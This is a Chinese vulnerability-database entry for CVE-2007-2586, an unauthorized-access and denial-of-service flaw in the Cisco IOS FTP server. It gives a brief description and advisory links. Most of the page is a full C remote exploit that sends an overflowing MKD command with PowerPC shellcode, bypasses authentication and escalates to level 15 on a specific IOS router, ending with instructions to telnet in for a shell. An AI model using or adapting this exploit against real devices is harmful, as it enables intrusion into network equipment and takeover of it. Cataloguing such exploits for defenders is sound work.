Cisco IOS FTP Server非授权访问及拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115786 漏洞类型 权限许可和访问控制
发布时间 2008-07-29 更新时间 2009-03-04
CVE编号 CVE-2007-2586 CNNVD-ID CNNVD-200705-168
漏洞平台 Hardware CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/6155
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-168
|漏洞详情
CiscoIOS是Cisco网络设备所使用的操作系统。CiscoIOS所带的FTPServer处理访问请求时存在漏洞,远程攻击者可能利用此漏洞非授权访问系统文件或导致拒绝服务。启用了IOSFTPServer功能的CiscoIOS没有正确检查用户授权,可能允许攻击者非授权读写设备文件系统中的任意文件,包括设备保存的配置,其中可能有口令或其他敏感信息;此外这种配置的CiscoIOS还可能导致在通过FTP传输文件时IOS重载。
|漏洞EXP
/*

 Cisco IOS FTP server remote exploit by Andy Davis 2008               
                                                                      
 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007               
                                                                      
 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router    
                                                                      
 Removes the requirement to authenticate and escalates to level 15    
                                                                      
 *********************************************************************
 To protect the innocent a critical step has been omitted, which means
 the shellcode will only execute when the router is attached to gdb.  
 I'm sure the PowerPC shellcoders out there will work it out...       
 *********************************************************************
                                                                      
 Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
 on the original IOS security research                                
                                                                      
 iosftpexploit <at> googlemail 'dot' com                              

*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

"\x3c\x80\x81\x83"      /* lis     4,vty_info@ha */
"\x38\x84\xda\x60"      /* la      4,vty_info@l(4) */
"\x7d\x08\x42\x78"      /* xor     8,8,8 */
"\x7c\xe4\x40\x2e"      /* lwzx    7,4,8 */
"\x91\x07\x01\x74"      /* stw     8,372(7) */
"\x39\x08\xff\xff"      /* subi    8,8,1 */
"\x38\xe7\x09\x1a"      /* addi    7,7,233 */
"\x91\x07\x04\xca"      /* stw     8,1226(7) */
"\x7d\x03\x43\x78"      /* mr      3,8 */
"\x3c\x80\x80\xe4"      /* lis     4,terminate@ha */
"\x38\x84\x08\x6c"      /* la      4,terminate@l(4) */
"\x7c\x89\x03\xa6"      /* mtctr   4 */
"\x4e\x80\x04\x20"      /* bctr    */

/* exists cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */

"\x80\x06\x23\xB8"      /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8      lwz     26, 20(26)
0x800623BC      mtctr   26
0x800623C0      mr      3, 27
0x800623C4      bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
        {
        printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");

        printf ("\nUsage: %s <target IP address>\n",argv[0]);
        exit(-1);
        }

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
        {
        printf("Error sending packet...quitting\n\n");
        exit (1);
        }
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}

// milw0rm.com [2008-07-29]
|参考资料

来源:CISCO
名称:20070509MultipleVulnerabilitiesintheIOSFTPServer
链接:http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml
来源:XF
名称:cisco-ios-ftp-unauthorized-access(34197)
链接:http://xforce.iss.net/xforce/xfdb/34197
来源:SECTRACK
名称:1018030
链接:http://www.securitytracker.com/id?1018030
来源:BID
名称:23885
链接:http://www.securityfocus.com/bid/23885
来源:OSVDB
名称:35334
链接:http://www.osvdb.org/35334
来源:VUPEN
名称:ADV-2007-1749
链接:http://www.frsirt.com/english/advisories/2007/1749
来源:SECUNIA
名称:25199
链接:http://secunia.com/advisories/25199
来源:BUGTRAQ
名称:20090120Re:RemoteCiscoIOSFTPexploit
链接:http://seclists.org/bugtraq/2009/Jan/0183.html
来源:OVAL
名称:oval:org.mitre.oval:def:5036
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5036